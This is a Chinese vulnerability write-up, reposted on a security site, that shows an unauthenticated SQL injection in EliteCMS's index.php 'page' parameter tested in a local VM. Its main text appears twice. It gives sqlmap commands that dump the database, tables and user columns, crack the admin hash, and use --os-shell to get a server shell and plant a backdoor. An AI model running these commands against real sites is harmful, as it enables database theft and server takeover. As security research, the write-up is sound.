ellite sql注入

ellite sql注入

本地环境搭建:

官网下载:http://www.elitecms.net/

安装步骤:

ellite sql注入
ellite sql注入

前台效果

ellite sql注入

后台效果:

ellite sql注入

代码分析

安装完以后,直接产看代码的文件,全局正则匹配select .*? where

ellite sql注入

快速通读下代码上下文,这里没有加过滤。接着搜索哪里调用了这个函数。

ellite sql注入

这里有调用,而且没有过滤,直接访问页面,抓包。

无需用户登录直接访问URL:http://www.elitecms.com/index.php?page=1

ellite sql注入

手动在page中构建payload,在page=1后面直接加个单引号,进行验证。

访问后,数据库返回来页面错误

ellite sql注入

很明显这里有注入,用SQLmap跑一下数据库信息

sqlmap命令:

sqlmap -u “http://www.elitecms.com/index.php?page=1″ –current-db –batch

数据库名信息:

ellite sql注入

然后使用下面这个命令获取数据库表信息

sqlmap -u “http://www.elitecms.com/index.php?page=1″ -D elitecms –tables –batch:

ellite sql注入

然后使用下面这个命令获取用户表里的字段信息:

sqlmap -u “http://www.elitecms.com/index.php?page=1″ -D elitecms -T users –columns –batch

ellite sql注入

最后获得管理员用户信息,使用下面命令:

ellite sql注入

通过上面的hash值,借助第三方平台拿下明文密码:

ellite sql注入

此时进入系统后台:

ellite sql注入

拿下系统后台权限,可以使用后台的全部功能。

接着通过—os-shell的选项,拿下服务权限,命令如下:

sqlmap -u “http://www.elitecms.com/index.php?page=1″ –os-shell

在过程中填写路径的时候,填上我们的实际路径就好,如下图所示:

ellite sql注入

选择2,在下面填写路径,最后结果返回系统shell,同时创建了后门文件。通过shell执行系统命令:

ellite sql注入

也可访问后门文件:

ellite sql注入

至此,通过前台文件index.php,无需用户登录,实现了拿系统后台权限,和服务器权限。造成了非常严重的后果。全过程都在本地虚拟机中进行的测试,域名也是解析的本地解析。本地环境搭建:

官网下载:http://www.elitecms.net/

安装步骤:

ellite sql注入
ellite sql注入

前台效果

ellite sql注入

后台效果:

ellite sql注入

代码分析

安装完以后,直接产看代码的文件,全局正则匹配select .*? where

ellite sql注入

快速通读下代码上下文,这里没有加过滤。接着搜索哪里调用了这个函数。

ellite sql注入

这里有调用,而且没有过滤,直接访问页面,抓包。

无需用户登录直接访问URL:http://www.elitecms.com/index.php?page=1

ellite sql注入

手动在page中构建payload,在page=1后面直接加个单引号,进行验证。

访问后,数据库返回来页面错误

ellite sql注入

很明显这里有注入,用SQLmap跑一下数据库信息

sqlmap命令:

sqlmap -u “http://www.elitecms.com/index.php?page=1″ –current-db –batch

数据库名信息:

ellite sql注入

然后使用下面这个命令获取数据库表信息

sqlmap -u “http://www.elitecms.com/index.php?page=1″ -D elitecms –tables –batch:

ellite sql注入

然后使用下面这个命令获取用户表里的字段信息:

sqlmap -u “http://www.elitecms.com/index.php?page=1″ -D elitecms -T users –columns –batch

ellite sql注入

最后获得管理员用户信息,使用下面命令:

ellite sql注入

通过上面的hash值,借助第三方平台拿下明文密码:

ellite sql注入

此时进入系统后台:

ellite sql注入

拿下系统后台权限,可以使用后台的全部功能。

接着通过—os-shell的选项,拿下服务权限,命令如下:

sqlmap -u “http://www.elitecms.com/index.php?page=1″ –os-shell

在过程中填写路径的时候,填上我们的实际路径就好,如下图所示:

ellite sql注入

选择2,在下面填写路径,最后结果返回系统shell,同时创建了后门文件。通过shell执行系统命令:

ellite sql注入

也可访问后门文件:

ellite sql注入

至此,通过前台文件index.php,无需用户登录,实现了拿系统后台权限,和服务器权限。造成了非常严重的后果。全过程都在本地虚拟机中进行的测试,域名也是解析的本地解析。

本文由Tide安全团队原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/275296
安全客 – 有思想的安全新媒体SQL注入ellite 赞 收藏

Tide安全团队 认证

分享到: QQ空间 新浪微博 微信 QQ facebook twitter

|推荐阅读

ellite sql注入

2022-06-28 14:30:41

PBot挖矿僵尸网络正利用新漏洞发起攻击

2022-06-28 12:00:05

主题测试文章,只做测试使用。发布者:1869,转转请注明出处:https://community.anqiangkj.com/archives/18467

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022年6月27日 下午3:37
下一篇 2022年6月28日 下午3:10

相关推荐